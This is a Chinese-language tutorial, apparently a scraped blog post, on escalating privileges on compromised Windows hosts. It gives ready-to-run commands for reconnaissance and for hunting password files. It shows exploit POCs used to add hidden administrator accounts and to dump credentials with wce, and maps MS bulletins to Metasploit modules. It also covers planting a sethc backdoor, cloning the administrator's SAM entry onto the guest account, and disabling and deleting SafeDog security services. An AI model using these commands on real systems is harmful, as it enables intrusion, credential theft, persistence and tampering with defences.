Windows提权基础:信息收集技巧及可用漏洞搜索
本文收集整理一些跟提权紧密相关的信息收集技巧和方法,以及如何在kali中搜索可用的漏洞,最后整理了目前可供使用的一些漏洞对应msf下的模块以及操作系统可提权的版本。
0X00 Windows提权信息收集
1. 收集OS名称和版本信息
systeminfo
systeminfo | findstr /B /C:"OS 名称" /C:"OS 版本"
2. 主机名称和所有环境变量
主机名称:hostname
环境变量:SET
3. 查看用户信息
查看所有用户:net user 或者net1 user
查看管理员用户组:net localgroup administrators或者net1 localgroup administrators
查看远程终端在线用户:query user 或者quser
4. 查看远程端口
(1)注册表查看
REG query HKLM\SYSTEM\CurrentControlSet\Control\Terminal" "Server\WinStations\RDP-Tcp /v PortNumber
查到的是16进制,需要转换为10进制
(2)通过命令行查看
获取对应的PID号:tasklist /svc | find "TermService"
通过PID号查找端口:netstat -ano | find "1980"
片
5. 查看网络情况
(1)网络配置情况:ipconfig /all
(2)路由器信息: route print
(3)要查看ARP缓存: arp -A
(4)查看网络连接: netstat -ano
(5)要查看防火墙规则:
netsh firewall show config
netsh firewall show state
6. 应用程序和服务
(1)要查看服务的进程ID:tasklist /SVC
(2)已安装驱动程序的列表:DRIVERQUERY
(3)已经启动Windows 服务net start
(4)查看某服务启动权限:sc qc TermService
(5)已安装程序的列表:wmic product list brief
(6)查看服务列表:wmic service list brief # Lists services
(7)查看进程列表wmic process list brief # Lists processes
(8)查看启动程序列表wmic startup list brief # Lists startup items
7. 检索敏感文件、目录文件操作
dir /b/s password.txt
dir /b /s *.doc
dir /b /s *.ppt
dir /b /s *.xls
dir /b /s *. docx
dir /b /s *.xlsx
dir /b/s config.* filesystem
findstr /si password *.xml *.ini *.txt
findstr /si login *.xml *.ini *.txt(1)列出d:\www的所有目录:
for /d %i in (d:\www\*) do @echo %i
(2)把当前路径下文件夹的名字只有1-3个字母的显示出来:
for /d %i in (???) do @echo %i
(3)以当前目录为搜索路径,把当前目录与下面的子目录的全部EXE文件列出:
for /r %i in (*.exe) do @echo %i
(4)以指定目录为搜索路径,把当前目录与下面的子目录的所有文件列出
for /r "f:\freehost\hmadesign\web\" %i in (*.*) do @echo %i
(5)显示a.txt里面的内容,因为/f的作用,会读出a.txt中:
for /f %i in (c:\1.txt) do echo %i
9. RAR打包
rar a -k -r -s -m3 c:\1.rar d:\wwwroot
10. php读文件
c:/php/php.exe "c:/www/admin/1.php"
8.自动收集系统有用信息脚本
for /f "delims=" %%A in ('dir /s /b %WINDIR%\system32\*htable.xsl') do set "var=%%A"
wmic process get CSName,Description,ExecutablePath,ProcessId /format:"%var%" >> out.html
wmic service get Caption,Name,PathName,ServiceType,Started,StartMode,StartName /format:"%var%" >> out.html
wmic USERACCOUNT list full /format:"%var%" >> out.html
wmic group list full /format:"%var%" >> out.html
wmic nicconfig where IPEnabled='true' get Caption,DefaultIPGateway,Description,DHCPEnabled,DHCPServer,IPAddress,IPSubnet,MACAddress /format:"%var%" >> out.html
wmic volume get Label,DeviceID,DriveLetter,FileSystem,Capacity,FreeSpace /format:"%var%" >> out.html
wmic netuse list full /format:"%var%" >> out.html
wmic qfe get Caption,Description,HotFixID,InstalledOn /format:"%var%" >> out.html
wmic startup get Caption,Command,Location,User /format:"%var%" >> out.html
wmic PRODUCT get Description,InstallDate,InstallLocation,PackageCache,Vendor,Version /format:"%var%" >> out.html
wmic os get name,version,InstallDate,LastBootUpTime,LocalDateTime,Manufacturer,RegisteredUser,ServicePackMajorVersion,SystemDirectory /format:"%var%" >> out.html
wmic Timezone get DaylightName,Description,StandardName /format:"%var%" >> out.html
0X01 Windows提权准备
我们已经知道如何高效的进行信息收集工作,后面我们根据根据Windows-Exploit-Suggester获取目前系统可能存在的漏洞。
通过前面的基础命令以及本章的第二章节,可以有针对性的对目标开展提权工作,根据Windows-Exploit-Suggester获取目前系统可能存在的漏洞。
1. 收集并编译相关POC
2. 若操作系统有杀毒软件以及安全防护软件,则需要对提权POC进行免杀,否则进行下一步。
3. 上传POC
4. 有webshell或者反弹webshell来执行命令
5. 搜索漏洞,根据关键字进行搜索例如MS10-061。
(1)在百度浏览器中搜索“MS10-061 site:exploit-db.com”
(2)packetstormsecurity网站搜索
https://packetstormsecurity.com/search/?q=MS16-016
(3)安全焦点,其BugTraq是一个出色的漏洞和exploit数据源,可以通过CVE编号,或者产品信息漏洞直接搜索。网址:http://www.securityfocus.com/bid。
0X02 使用msf平台搜索可利用POC
- 搜索poc
在kali中打开msf或者执行“/usr/bin/msfconsole”,在出来的命令提示符下使用命令进行搜索:
search ms08
search ms09
search ms10
search ms11
search ms12
search ms13
search ms14
search ms15
search ms16
search ms17
- 查看相关漏洞情况
可以通过微软官方网站查看漏洞对应的版本,利用方式为https://technet.microsoft.com/library/security/漏洞号,例如查看ms08-068则其网页打开方式为:
https://technet.microsoft.com/library/security/ms08-068,如图2所示,如果显示为严重则表明可以被利用。
0X03 实施提权
(1)直接执行木马。
poc.exe ma.exe
(2)添加用户
poc.exe “net user antian365 1qaz2wsx /add”
poc.exe “net localgroup administrators antian365 /add”
(3)获取明文密码或者哈希值
poc.exe “wce32.exe -w”
poc.exe “wce64.exe -w”
poc.exe “wce32”
0X04 相关资源下载
- Tools下载
wce下载:
http://www.ampliasecurity.com/research/windows-credentials-editor/
http://www.ampliasecurity.com/research/wce_v1_42beta_x32.zip
http://www.ampliasecurity.com/research/wce_v1_42beta_x64.zip
sysinternals :https://technet.microsoft.com/en-us/sysinternals/bb842062
mimikatz :http://blog.gentilkiwi.com/mimikatz
python :https://www.python.org/downloads/windows/ - 搜索漏洞和shellcode
http://www.exploit-db.com
http://1337day.com
http://0day.today
http://www.securityfocus.com
http://seclists.org/fulldisclosure/
http://www.exploitsearch.net
http://www.securiteam.com
http://metasploit.com/modules/
http://securityreason.com
https://cxsecurity.com/exploit/
http://securitytracker.com/
0X05 Windows本地溢出漏洞对应表
Windows2003对应漏洞、编号及其影响系统及msf模块
1. 2007年对应漏洞、编号及其影响系统及msf模块
(1)KB935966 |MS07-029 Win2000SP4、Win2003SP1/SP2 exploit/windows/dcerpc/ms07_029_msdns_zonename
exploit/windows/smb/ms07_029_msdns_zonename
(2)KB937894| MS07-065 WinxpSP2、Win2000SP4、WinXP-x64-SP2、Win2003SP1/SP2
exploit/windows/dcerpc/ms07_065_msmq
(3)KB941568|MS07-064 Win2000SP4 exploit/windows/misc/ms07_064_sami
(4)KB944653|MS07-067 WinXPSP2、WinXP-x64-SP2、Win2003SP1/SP2
2. 2008年对应漏洞、编号及其影响系统及msf模块
(1)KB958644 |MS08-067 Win2000SP4、WinXP-SP2/SP3、
WinXP-64-SP/SP2、Win2003SP1/SP2、Win2003-64/SP2
exploit/windows/smb/ms08_067_netapi
(2)KB 957097| MS08-068 Win2000SP4、WinXP-SP2/SP3、
WinXP-64-SP/SP2、Win2003SP1/SP2、Win2003-64/SP2
exploit/windows/smb/smb_relay
3. 2009年对应漏洞、编号及其影响系统及msf模块
(1)KB952004|MS09-012 PR Win2003/2008
(2)KB956572|MS09-012烤肉
(3)KB970483|MS09-020 IIS6
(4)KB971657|MS09-041 WinXP、Win2003提权
(5)KB975254|MS09-053 IIS5远程溢出,Windows2000SP4,Win2003及Win2008拒绝服务。
(6)KB975517 |MS09-050 Vista、Win2008-32/SP2、Win2008-64/SP2
exploit/windows/smb/ms09_050_smb2_negotiate_func_index
4. 2010年对应漏洞、编号及其影响系统及msf模块
(1)KB977165|MS10-015 Vista、Win2003-32-64/SP2、Win2008-32-64/SP2
exploit/windows/local/ms10_015_kitrap0d
(2)KB 2347290|MS10-061 Winxp3、Winxp64sp2、Win2003-32-64 SP2、Win2008-32-64 SP2
(3)KB2360937|MS10-084 Winxp3、Winxp64sp2、Win2003-32-64 SP2
(4)KB2305420| MS10-092 Win7-32-64、Win2008-32-64、Win2008R2-32-64
exploit/windows/local/ms10_092_schelevator
(5)KB2124261|KB2271195 MS10-065 IIS7
5. 2011年对应漏洞、编号及其影响系统及msf模块
(1)KB2393802|MS11-011
Winxp32-64-SP3、Win2003-32-64-SP2、Win7-32-64-SP1、 Win2008-R2-64-SP2
(2)KB2478960|MS11-014
Winxp32-64-SP3、Win2003-32-64-SP2
(3)KB2507938|MS11-056
Winxp32-64-SP3、Win2003-32-64-SP2、Win7-32-64-SP1、 Win2008-R2-64-SP2
(4)KB2566454|MS11-062
Winxp32-64-SP3、Win2003-32-64-SP2
(5)KB2620712|MS11-097
Winxp-SP3、Win2003-SP2、Win7-64-SP1、 Win2008R2-64-SP1
(6)KB2503665|MS11-046
Winxp-SP3、Win2003-SP2、Win7-64-SP1、 Win2008R2-64-SP1
(7)KB2592799|MS11-080
Winxp-SP3、Win2003-SP2
exploit/windows/local/ms11_080_afdjoinleaf
6. 2012年对应漏洞、编号及其影响系统及msf模块
(1)KB2711167| KB2707511|KB2709715|MS12-042 sysret –pid
Winxp-SP3、Win2003-SP2、Win7-64-SP1、 Win2008R2-64-SP1、Win8-32-64、Win2012
(2)KB2621440|MS12-020 Winxp-SP3、Win2003-SP2、Win7-64-SP1、 Win2008R2-64-SP1、
7. 2013年对应漏洞、编号及其影响系统及msf模块
(1)KB2778930|MS13-005 Vista-32-64-SP2、Win2008-32-64-SP2、Win7-32-64-SP1、 Win2008R2-64-SP1、Win8-32-64、Win2012
exploit/windows/local/ms13_005_hwnd_broadcast
(2)KB2840221|MS13-046 WinXP-32-SP3、WinXP-64-SP2、Win2003-32-64-SP2、Vista-32-64-SP2、Win2008-R2-32-64-SP2、Win7-32-64-SP1、 Win2008R2-64-SP1、Win8-32-64、Win2012、Win2012R2
(3)KB2850851|MS13-053 EPATHOBJ 0day,WinXP-32-SP3、WinXP-64-SP2、Win2003-32-64-SP2、Vista-32-64-SP2、Win2008-R2-32-64-SP2、Win7-32-64-SP1、 Win2008R2-64-SP1、Win8-32-64、Win2012
exploit/windows/local/ms13_053_schlamperei
8. 2014年对应漏洞、编号及其影响系统及msf模块
(1)KB 2914368 |MS14-002 WinXPSP3、WinXP-64-SP2、Win2003-32-64-sp2
exploit/windows/local/ms_ndproxy
(2)KB 2916607|MS14-009 Win2003-32-64-SP2、Vista-32-64-SP2、Win2008-32-64-SP2、Win7-R2-32-64-SP1、 Win2008R2-64-SP1、Win8-8.1-32-64、Win2012、Win2012R2
exploit/windows/local/ms14_009_ie_dfsvc
(3)KB3000061|MS14-058 Win2003-32-64-SP2、Vista-32-64-SP2、Win2008-R2-32-64-SP2、Win7-32-64-SP1、 Win2008R2-64-SP1、Win8-8.1-32-64、Win2012、Win2012R2
exploit/windows/local/ms14_058_track_popup_menu
(4)KB 2989935|MS14-070 Win2003-32-64-SP2
exploit/windows/local/ms14_070_tcpip_ioctl
9. 2015年对应漏洞、编号及其影响系统及msf模块
(1)KB3023266|MS15-001 Win7-32-64-SP1、Win2008R2-32-64-SP1、 Win2008R2-64-SP1、Win8-8.1-32-64、Win2012、Win2012R2
exploit/windows/local/ntapphelpcachecontrol
(2)KB3025421|MS15_004、Win7-32-64-SP1、Win2008R2-32-64-SP1、 Win2008R2-64-SP1、Win8-8.1-32-64、Win2012、Win2012R2
exploit/windows/local/ms15_004_tswbproxy
(3)KB3041836|MS15-020、Win2003-32-64-SP2、Vista-32-64-SP2、Win2008-32-64-SP2、Win7-R2-32-64-SP1、 Win2008R2-64-SP1、Win8-8.1-32-64、Win2012、Win2012R2
exploit/windows/smb/ms15_020_shortcut_icon_dllloader
(4)KB3057191|MS15-051
Win2003-32-64-SP2、Vista-32-64-SP2、Win2008-32-64-SP2、Win7-R2-32-64-SP1、 Win2008R2-64-SP1、Win8-8.1-32-64、Win2012、Win2012R2
exploit/windows/local/ms15_051_client_copy_image
(5)KB3077657|MS15-077
Win2003-32-64-SP2、Vista-32-64-SP2、Win2008-32-64-SP2、Win7-R2-32-64-SP1、 Win2008R2-64-SP1、Win8-8.1-32-64、Win2012、Win2012R2
(6)KB 3079904|MS15_078
Win2003-32-64-SP2、Vista-32-64-SP2、Win2008-32-64-SP2、Win7-R2-32-64-SP1、 Win2008R2-64-SP1、Win8-8.1-32-64、Win2012、Win2012R2
exploit/windows/local/ms15_078_atmfd_bof
(7)KB3079904|MS15-097
Win2003-32-64-SP2、Vista-32-64-SP2、Win2008-32-64-SP2、Win7-R2-32-64-SP1、 Win2008R2-64-SP1、Win8-8.1-32-64、Win2012、Win2012R2
exploit/windows/smb/ms15_020_shortcut_icon_dllloader
10. 2016年对应漏洞、编号及其影响系统及msf模块
(1)KB3134228|MS16-014 Win2008、Win7、Win2012
(2)KB3124280|MS16-016 WebDAV提权漏洞,Vista-32-64-SP2、Win2008-32-64-SP2、Win7-32-64-SP1、Win2008R2-64-SP1、Win8.1-32-64、Win2012、Win2012R2、Win10-32-64
exploit/windows/local/ms16_016_webdav
(3)KB3139914|MS16-032、Vista-32-64-SP2、Win2008-32-64-SP2、Win7-32-64-SP1、Win2008R2-64-SP1、Win8.1-32-64、Win2012、Win2012R2、Win10-32-64
exploit/windows/local/ms16_032_secondary_logon_handle_privesc
Windows 2003 SP2 安装了MS10-046补丁,可用ms15_020进行溢出
Windows 2008 SP2 (32 bits)安装了MS14-027补丁可用ms15_020进行溢出
0X06 过安全狗
1. vbs法
将以下代码保存为1.vbs然后执行cscript 1.vbs
Set o=CreateObject( "Shell.Users" )
Set z=o.create("user")
z.changePassword "1qaz2WSX12",""
z.setting("AccountType")=3
2. shift后门法
copy C:\sethc.exe C:\windows\system32\sethc.exe
copy C:\windows\system32\sethc.exe C:\windows\system32\dllcache\sethc.exe
3. for循环添加帐号法
for /l %%i in (1,1,100) do @net user temp asphxg /add&@net localgroup administrators temp /add
4. 修改注册表法
administrator对应值是1F4,GUEST是1F5。
(1)使用net1 user guset 1 ,将guest密码重置为1,无需过问是guest否禁用
(2)执行:reg export "HKEY_LOCAL_MACHINE\SAM\SAM\Domains\Account\Users\000001F4" "C:\RECYCLER\1.reg"
导出administrator的注册表值到某路径,修改内容,将"V"值删除,只留F值,将1F4修改为1F5,保存。
(3)执行regedit /s C:\RECYCLER\1.reg 导入注册表
就可以使用,guest 密码1登陆了。
5. 直接修改管理员密码法,尽量不用这招,实在没有办法就用这个。
net user administrator somepwd
6. 删除与停止安全狗相关服务法
如果是system权限可以采取以下方法停止安全狗
(1)停止安全狗相关服务
net stop "Safedog Guard Center" /y
net stop "Safedog Update Center" /y
net stop "SafeDogCloudHelper" /y
(2)直接删除SafeDogGuardCenter服务
sc stop "SafeDogGuardCenter"
sc config "SafeDogGuardCenter" start= disabled
sc delete "SafeDogGuardCenter" sc stop " SafeDogUpdateCenter"
sc config " SafeDogUpdateCenter" start= disabled
sc delete " SafeDogUpdateCenter" sc stop " SafeDogCloudHelper"
sc config " SafeDogCloudHelper" start= disabled
sc delete " SafeDogCloudHelper"
参考链接:
http://netsecurity.51cto.com/art/201704/537105.htm
Windows提权基础:信息收集技巧及可用漏洞搜索相关推荐
- windows提权速查流程
windows提权速查流程 1.可利用漏洞信息收集 收集本机systeminfo中补丁信息 在提权辅助平台 https://i.hacking8.com/tiquan/ 中查询可利用exp 然后查询e ...
- Windows提权基本原理,各位表哥了解下!
Windows提权基本原理 没有多少人谈论在Windows下提权,是一件让人遗憾的事!我想,没有人这么做的理由有以下几点: 在渗透测试项目中,客户需要的验证就是一个低权限shell. 在演示环境,你经 ...
- 张小白的渗透之路(十一)--windows提权详解
windows基础命令 systeminfo | findstr OS **#获取系统版本信息** hostname **#获取主机名称** whomai /priv **#显示当前用户的安全特权** ...
- 漏洞利用与提权(一):提权基础
1. 提权概述 1.1 概述 提权顾名思义就是提高自己在系统中的权利.渗透测试以获取系统的最高权限为目标,首先通过寻找漏洞,获取WebShell权限,然后进行提权. 提权可分为: 操作系统提权 Win ...
- 使用MSF进行提权(windows提权、linux提权、wesng使用)
文章目录 MSF Windows提权 反弹shell 提权 END推荐阅读 MSF Linux提权 反弹shell 补充wesng用法 Metasploit 是一个渗透框架,kali 内安装了,安装位 ...
- Windows提权流程及手法
Windows提权 一.信息收集 二.WinSystemHelper 三.Sherlock 四.MSF提权 五.参考链接 一.信息收集 收集本机systeminfo中补丁信息 在提权辅助平台 http ...
- 系统提权之:Windows 提权
郑重声明: 本笔记编写目的只用于安全知识提升,并与更多人共享安全知识,切勿使用笔记中的技术进行违法活动,利用笔记中的技术造成的后果与作者本人无关.倡导维护网络安全人人有责,共同维护网络文明和谐. Wi ...
- hackmap-[windows权限提升(windows提权思路)]
hackmap-[windows权限提升{windows提权思路}] 1.前言 1.1.提权分类 水平权限提升(越权) 垂直权限提升 1.2 windows提权概述 2.windows基于WebShe ...
- Windows提权方法简单总结
目录 前言 一.本地提权 系统内核溢出漏洞提权 错误系统配置提权 可信任服务路径漏洞 系统服务权限配置错误 计划任务提权 GPP组策略首选项提权 令牌窃取 数据库提权 二.域内提权 MS14-068 ...
最新文章
- 把文件每行的tab键分隔符改成逗号分隔符
- linux下安装部署ansible
- mongodb 只查询某个字段
- ORM之SQLAlchemy
- 杭电 2111 Saving HDU (贪心)
- 成功解决 threading Exception unhandled RuntimeError
- C++(十)——模板(上)
- SAP Commerce Cloud(原Hybris) impex 里的美元(dollar $)符号
- 015. Object event handling debug - Parameter COM_IOITF_DEBUG
- 深入理解控制反转(IoC)和依赖注入(DI)
- 【前端 · 面试 】HTTP 总结(四)—— HTTP 状态码
- Java程序性能优化(让你的Java程序更快、更稳定)
- Mars 开源月报(2020.3)
- 冬天吃柿子养颜防衰老
- 消费升级背景下零食行业发展报告_上海日报奥纬陈闻:疫情之下,“小”零食,“大”产业...
- 07-PDI(Kettle)源码编译8.2.0.0.R版本
- Spring扩展点总结
- uefi怎么念_UEFI是什么,看完您就全明白了
- pubmed影响因子插件_科研干货 | Scholarscope在新版PubMed中实现基于影响因子的文献筛选...
- 对亲人发脾气,对陌生人客气,这就是人生!
热门文章
- ASPWEB编程开发常用的代码
- 用户计算机名更改为英文,win10将用户名改为英文怎么改_win10如何更改用户名为英文图文教程-系统城...
- 基于PHP和mysql的简单学生成绩管理系统
- 50个明星区块链项目跌破发行价,超10家项目几近归零
- C++问答1 语言基础
- 计算机考研的专硕是不是越来越难,专硕考研变难了,该211改考数一英一!近期高校初试科目调整通知...
- 快应用开发心得——新手入门指南
- 把多列的迭代次数问题化简为单列问题
- HTML 樱花飘落界面效果
- android软键盘上添加一个按钮